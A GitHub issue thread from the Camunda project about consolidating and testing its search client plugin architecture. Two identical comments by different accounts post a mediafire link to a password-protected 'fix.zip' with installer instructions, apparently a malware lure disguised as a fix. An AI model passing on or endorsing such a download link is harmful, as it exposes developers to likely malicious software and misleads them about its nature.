### ISSUE TITLE
Productize search plugin architecture

### ISSUE THREAD

**Issue by npepinpe** [camunda/camunda#21559]
**Description**

[We recently merged the first iteration of the search client plugins](https://github.com/camunda/camunda/pull/20794). This allows users to define plugins which will intercept every request to our search database (e.g. Elasticsearch, Opensearch) in Operate, Tasklist, and Zeebe, and apply custom headers to these request.

As we wanted something that users can test in 8.6.0-alpha5, we ended up going with a very broad, hard to maintain approach, and lower test coverage than what we would usually accept.

The goal here is:

- Improve test coverage.
  - Lack of integration tests ensuring that the autowiring of the properties produces an appropriate connector.
- Centralize plugin loading/architecture to avoid code that is pasted six times in different parts.
  - This makes maintenance harder, as if you find a bug somewhere, you _need_ to fix it everywhere, and it's easy to forget some place.
- Integrate with new search-client architecture.

To do so, we will work on the following items:

- [x] In `ExternalJarClassLoader`, only warn if calling the default close. Add a new method to close explicitly if we want that will not warn.
  - This will be used further down the line.
  - That said, I already checked, and it's not strictly required to close the `ExternalJarClassLoader`, as any files opened for it are cleaned up during garbage collection. Furthermore, opening multiple ones for the same JAR does not consume more file descriptors, as there is some caching involved. So it's safe to open and forget to close, but this relies on undocumented implementation behavior, so we should look into closing those which will not live for the duration of the application lifetime (e.g. exporters).
- [x] Rename `camunda-search-plugins` to `camunda-search-client-plugin` module, and move it to a submodule of `camunda-search`, and set that as the parent.
  - It seems to me in the future, all search related modules would go there, so it makes sense to add our plugin one there as well. 
- [x] #21562
  -  This eases maintenance as we can now test the loading and intercepting via unit tests, making it easier to write controlled tests, and improving our test coverage.
  - I would advocate a similar `Repository` pattern as we have with the interceptors and exporters as well. I will write more in the issue dedicated to this.
- [x] #21563
- [x] Add missing integration tests (Operate ES/OS connectors, Tasklist ES/OS connectors).
  - Note that Zeebe seems to have no Elasticsearch/Opensearch QA tests, but just exporter integration tests. We can stick with that for now, as Zeebe exporter configuration is not instantiated through Spring anyway.
- [x] Update sample(s)
- [x] All required documentation changes

I will write follow up issues for the more "complex" action items.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by npepinpe** [comment]
I took a few hours to quickly sketch what this could look like. You can use this as inspiration, though it's not in a merge-able state right now and would need to be disantangled (and likely challenged, this is a first draft): https://github.com/camunda/camunda/compare/np-search-plugin-followup?expand=1

There's a lot of duplication in the tests, for example, and I didn't really spend time thinking if anything could be improved. More of a guideline PR than anything.

**Comment by npepinpe** [comment]
The last part is definitely not out of scope. I mistakenly used `search clients` which is confusing considering the new architecture, but I meant it's used in all ES/OS clients. It's clearer if you read the issue itself :sweat_smile: 

I'll update the name, but would maintain it's a must have as it's pretty much the main acceptance criteria.
